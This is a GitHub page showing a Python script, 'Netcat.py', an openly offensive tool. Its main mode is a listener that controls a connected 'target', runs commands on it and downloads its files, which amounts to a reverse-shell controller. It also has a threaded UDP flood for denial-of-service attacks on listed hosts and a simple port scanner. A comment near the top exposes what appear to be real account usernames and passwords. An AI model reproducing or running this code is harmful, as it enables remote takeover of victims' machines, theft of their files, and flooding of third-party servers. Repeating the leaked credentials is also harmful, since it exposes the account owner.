-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathNetcat.py
More file actions
483 lines (424 loc) · 17.7 KB
/
Netcat.py
File metadata and controls
483 lines (424 loc) · 17.7 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
#!/usr/bin/python
#-*-coding:utf8;-*-
#qpy:console
from urllib.request import urlretrieve
import socketserver
import http.server
import subprocess
import threading
import argparse
import random
import socket
import tqdm
import time
import sys
import os
#git account p = DEVILO.K@evil123 ,u = omer-devil: password of 000webhost = (#yT8w5JFz^*K6ELf)AVK)
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
def clear():
os.system("clear")
help = YELLOW + """\n\t\t-------------- Help ------------------\n
Commands\t\tUse\t\t\t\tExample"""+END+GREEN+"""
l-host\t\tlocal-host <command>\t\tl-host ls
download\t\tdownload <file name>\t\tdownload music.mp4
server\t\tserver <IP:PORT> \t\tserver 127.0.0.1:468
target-ip\t\ttarget-ip \t\tit shows the target ip
output_save\t\toutput_save <True|False>\toutput_seve True or output_save False
help\t\tit shows this help message
if you on windows you can reset the password by typing as follows
net user <user name> <new password> example: net user omer password123
For more information type the name of the command follow by -h or --help
""" + END
def HELP():
print("""
------------------------------------------help---------------------------------------------
[+] netcat-v1.5.py [Options]
[+] netcat-v1.5.py [[-h,--help,help] , [-d,--download] , [-s,--port-scan] , [-l,--listen] , [--udp-flood]]
[+] Options:
-h,--help,help : it print this help message
-d.--download : it used to download files from the given url
-s,--port-scan : it used to scan the given host for an open Port
-l,--listen : it used to liston for target to connect
--udp-flood : it used to attack the given host and other by providing the IP
""")
def run_server(dir_name):
try:
os.chdir(dir_name)
IP = socket.gethostname()
PORT = 8080
#creating request handler with variable name handler
handler = http.server.SimpleHTTPRequestHandler
#binding the request with the ip and port as httpd
with socketserver.TCPServer((IP, int(PORT)), handler) as httpd:
messeage = YELLOW+"[+] Server started at -> "+IP+":"+str(PORT)+END
print(messeage)
#running the server
httpd.serve_forever()
except Exception as e:
print(e)
def download(url):
try:
_save_as = input("[+] Enter file name to save it as: ")
if _save_as == "" or _save_as == " "*len(_save_as):
print("[!] Please provid a file name!!")
else:
#os.system("clear")
urlretrieve(url,_save_as)
except Exception as e:
print(e)
def port_scan(_host):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
for port in range(1,100):
try:
s.connect((host,port))
print(f"[+] Found open port at {_host}:{port}")
except:
print(f"[-] port is close {port}")
def udp_flood(_ss,_bytes,_host):
while not(ch_point):
try:
for _port in range(1,100):
_ss.sendto(_bytes,(_host,_port))
except:
break
print("[+] Thread stoped!...",_host)
def emo():
emots = ["☆","♤",
"♡","◇",
"♧","¤",
"@","■"
]
emot = random.choice(emots)
return emot
def Help(com):
if com == "l-host":
print(YELLOW+"\nCommands\t\tUse"+END)
print("l-host \t\tl-host <command> : Executing command on localhost or current hosting machine")
print("""
l-host <commands> : used to execute command on the local-host
example : l-host pwd
l-host ls""")
elif com == "download":
print(YELLOW+"\nCommands\t\tUse"+END)
print("download\t\tsend <file name> : download file to the host")
print(""""
download <file_name> : used to download file,mid,app and other from the target
example : download video.mp4
download music.mp3
download dir_name2/dir_name2/music.mp3""")
elif com == "server":
print(YELLOW+"\nCommands\t\tUse"+END)
print("server \t\tserver <IP:PORT> ")
print("""
server <host:port> : used to run http server on the target to access target file throughout browser
example : server 127.0.0.1:55555
note that: it only recommend on the same network""")
elif com[:9] == "target-ip":
print(YELLOW+"\nCommands\t\tUse"+END)
print("target-ip\t\ttarget_ip")
print("""
target-ip <optional_command>: used to return the target ip
example : target-ip
target-ip help : help is the only optional command available""")
elif com == "output_save":
print(YELLOW+"\nCommands\t\tUse"+END)
print("output_save\t\toutput_save <True|False>")
print("""
output_save <True|False> : used to save the received output command to default file name or
you can just changed the file name
example : output_seve True : start saving
output_seve False : stop saving""")
else:
print(help)
def LocalHost(com):
print(YELLOW+"\n\n\n"+"-"*50+END)
print(GREEN+"[.......BEGINNING EXECUTING COMMAND ON LOCALHOST.......]"+END)
print(YELLOW, "-"*50,END, "\n")
if com[:2] == "cd":
try:
os.chdir(com[3:])
except Exception as e:
print(e)
elif com[:2] == "ls":
com = ("ls --color" + com[3:])
os.system(com)
else:
os.system(com)
print(YELLOW+"\n"+"-"*50+END)
print(GREEN+"[...................END OF EXECUTING...................]"+END)
print(YELLOW,"-"*50,END, "\n\n\n")
def recive(c,_port):
print(_port)
mp = 131537871
_s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print(MAGENTA+"[+] START_DAWNLOADING..."+END)
try:
_s.bind((host,_port))
_s.listen(5)
(_conn,_addr) = _s.accept()
except:
pass
file_size = int(_conn.recv(1024).decode("utf-8"))
_size = (125.44*file_size)/mp
print("file name: ",c,"file size: ",_size,"MB")
with open(c,"wb") as file:
#The time when the data start recving
start_time = time.time()
progress = tqdm.tqdm(unit="B", unit_scale=True, unit_divisor=1024,total=file_size)
while True:
data = _conn.recv(1024)
if not(data):
progress.update(1024)
#time.sleep(1)
break
progress.update(1024)
file.write(data)
#The time when the data stop recving
progress.update(1024)
end_time = time.time()
print("\nFile dwonload successfully in ",float(end_time - start_time),"seconds")
_conn.close()
_s.close()
def main(port,_port):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
seve_to_file = False
default_fname = "save_out_put.txt"
try:
s.bind((host,port))
print(GREEN+"[WAITING FOR THE CONNECTION...]"+END)
s.listen(5)
(conn,addr) = s.accept()
pwd = conn.recv(1024).decode("utf-8")
clear()
#print(YELLOW+"\t\t\t[TARGET ADDRS = "+END+GREEN+addr[0]+"]"+END)
except Exception as e:
print(RED,"[!][!] ",e,END)
exit()
except KeyboardInterrupt:
clear()
print(RED+"[KEYBOAD INTERRUPT Ctrl + C] Waite...")
try:
input("[Peres_Enter_To_Exit...]"+END)
clear()
s.close()
exit(0)
except KeyboardInterrupt:
print(YELLOW+"[-] stupid can't escape this reality"+END)
s.close()
exit()
pass
while True:
try:
emot = emo()
com = input(BLUE+"<●"+END+GREEN+"["+END+YELLOW+"Net-Cat"+END+GREEN+"]"+END+BLUE+emot+END+GREEN+"["+END+MAGENTA+pwd+END+GREEN+"]"+END+BLUE+"> "+END+GREEN+"\n\t └─$ ")
"""help me"""+END
if com[:8]=="download":
if len(com) == 8:
print(GREEN,"[+] Try: {} -h or --help".format(com),END)
elif com[9:] == "-h" or com[9:] == "--help":
Help(com[:8])
else:
conn.send(str.encode(com))
c = com[9:]
recive(c,_port)
elif com[:6] == "l-host":
if len(com) == 6:
print(GREEN,"[+] Try: {} -h or --help".format(com),END)
elif com[7:] == "-h" or com[7:] == "--help":
Help(com[:6])
else:
com = com[7:]
LocalHost(com)
elif com[:9] == "target-ip":
if len(com) == 9:
print(GREEN,"[+] [TARGET]",END,YELLOW, " target ip = {}".format(addr[0]),END )
else:
if com[10:] == "help" or com[10:] == "-h" or com[10:] == "--help":
Help(com[:9])
else:
print(RED+"[!] Invalid commands!!\n"+END,GREEN+"[Try] : target-ip help, -h or --help"+END)
elif com[:11] == "output_save":
if len(com) == 11:
print(GREEN,"[+] Try: {} -h or --help".format(com),END)
elif com[12:] == "-h" or com[12:] == "--help":
Help(com[:11])
elif com[12:] == "True" or com[12:] == "true":
seve_to_file = True
new_fname = input("[+] Enter file name"+YELLOW+"(Default : {}): ".format(default_fname)+END)
if len(new_fname) != 0:
if new_fname == (" " * len(new_fname)):
print(YELLOW, "[+] Please Enter Valid Name ",END)
seve_to_file = False
else:
default_fname = new_fname
elif com[12:] == "False" or com[12:] == "false":
seve_to_file = False
elif com == "help":
Help(com)
elif com[:6] == "server":
if len(com) == 6:
print(GREEN,"[+] Try: {} -h or --help".format(com),END)
elif com[7:] == "-h" or com[7:] == "--help":
Help(com[:6])
else:
if ":" in com:
conn.send(str.encode(com))
else:
print(RED+"Invalid addres!!"+END)
else:
if com == "" or com == (" " * len(com)):
com = "echo '[!][!] cannot execute empty commands :p'"
conn.send(str.encode(com))
if com == "exit" or com == "quite":
try:
input(RED+"[Peres_Enter_To_Exit...]"+END)
print(MAGENTA+"[EXITING... Good Bay...]"+END)
conn.send(str.encode(com))
break
except KeyboardInterrupt:
print(YELLOW+"[-] stupid can't escape this reality"+END)
break
# maximum recive data 99999999B = 953.6743154526MB
m = str(conn.recv(999999999),"utf-8")
if "-pwd@-" in m:
pwd = m[6:]
m = GREEN+"[+] successfully moved to : " + m[6:] +END
print(m)
if seve_to_file:
with open("input.txt","w") as f0:
f0.write(m)
with open("input.txt","r") as f,\
open(default_fname,"a") as f2:
f2.write("<● [Netcat]-[{}]>{}\n".format(pwd,com))
for word in f.readlines():
if "." in word:
if "[" in word:
f2.write("\t\t"+word[7:-4]+"[directory]\n")
else:
f2.write("\t\t"+word)
else:
if "[" in word:
f2.write("\t\t/"+word[7:-4]+"[directory]\n")
else:
f2.write("\t\t/"+word)
os.system("rm -r input.txt")
except Exception as e:
print(e)
except KeyboardInterrupt:
clear()
print(RED+"[KEYBOAD INTERRUPT Ctrl + C] Waite..."+END)
try:
input(MAGENTA+"[Peres_Enter_To_Continuse...]"+END)
clear()
pass
except KeyboardInterrupt:
print(YELLOW+"[-] stupid can't escape this reality"+END)
pass
conn.close()
s.close()
if __name__ == "__main__":
global ch_point
global valid
global host
global port
ch_point = False
_hosts = []
valid = False
host = ""
port = 55555
try:
if sys.argv[1] == "-h" or sys.argv[1] == "--help" or sys.argv[1] == "help":
HELP()
elif sys.argv[1] == "--download" or sys.argv[1] == "-d":
try:
if sys.argv[2] == " "*len(sys.argv[2]):
print("[!] Please Enter Valid url.\n[+] Try -d https://www.example-web.com/sample.pdf or\n--download https://www.example-web.com/sample.pdf")
else:
download(sys.argv[2])
except:
print("[+] Try -d https://www.example-web.com/sample.pdf or\n--download https://www.example-web.com/sample.pdf")
elif sys.argv[1] == "--port-scan" or sys.argv[1] == "-s":
try:
port_scan(sys.argv[2])
except:
print(sys.argv[2])
print("[+] Try: -s 127.0.0.1 or --port-scan 127.0.0.1 [-s,--port-scan <host>]")
elif sys.argv[1] == "--udp-flood":
try:
host = sys.argv[2]
Exit = ["e","q","quite","exit"]
_list = host.split(",")
host_l = len(_list)
_bytes = random._urandom(1024)
_ss = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
if host_l == 1:
_host = _list[0]
try:
_ss.sendto(_bytes,(_host,80))
print("valid addres..")
_hosts.append(_host)
t = threading.Thread(target = udp_flood,args = (_ss,_bytes,_host))
t.start()
print("Trhread is running...")
except:
print("[+] Invalid addres...",_host)
valid = True
else:
_host = _list[0]
try:
for _host in _list:
_ss.sendto(_bytes,(_host,80))
print("valid addres...")
_hosts.append(_host)
t = threading.Thread(target = udp_flood,args = (_ss,_bytes,_host))
t.start()
print("Thread is running...")
except:
print("[+] Invalid addres...",_host)
valid = True
h = "[+] type q,quite,e or exit to stop the attack!!\nCommands: list -> to list all the target kill -> to add new target"
print(h)
while True:
if not(valid):
_com = input("[+] > ")
if _com in Exit:
ch_point = True
break
elif _com == "list":
print("\t","-"*15,"list of target","-"*15)
for i,_host_l in enumerate(_hosts):
print(f"\t[-{i+1}-] {_host_l}")
elif _com == "kill":
kill = input("[+] kill > ")
try:
_ss.sendto(_bytes,(kill,80))
print(kill)
_hosts.append(kill)
t = threading.Thread(target = udp_flood,args = (_ss,_bytes,kill))
print("valid addres...",kill)
t.start()
except:
print("[+] Invalid addres...",kill)
print(h)
else:
print(h)
break
except Exception as e:
print("[+] try: --udp-flood 142.250.181.164 or --udp-flood www.google.com [--udp-flood <host>]\n--udp-flood 127.0.0.1,142.250.181.164,8.8.8.8 no space bettwen the host and the coma(,)",e)
elif sys.argv[1] == "--listen" or sys.argv[1] == "-l":
print("iam in")
try:
port = int(sys.argv[2])
_port = port - 1
print("[+] listening on port number {}".format(port))
main(port,_port)
except:
_port = port - 1
main(port,_port)
elif sys.argv[1] == "-ss" or sys.argv[1] == "--server":
try:
run_server(sys.argv[2])
except:
print("[+] Try: -ss dir_name1/dir_name2 or --server dir_name1/dir_name2 [-ss,--server <path of the folder>")
except:
HELP()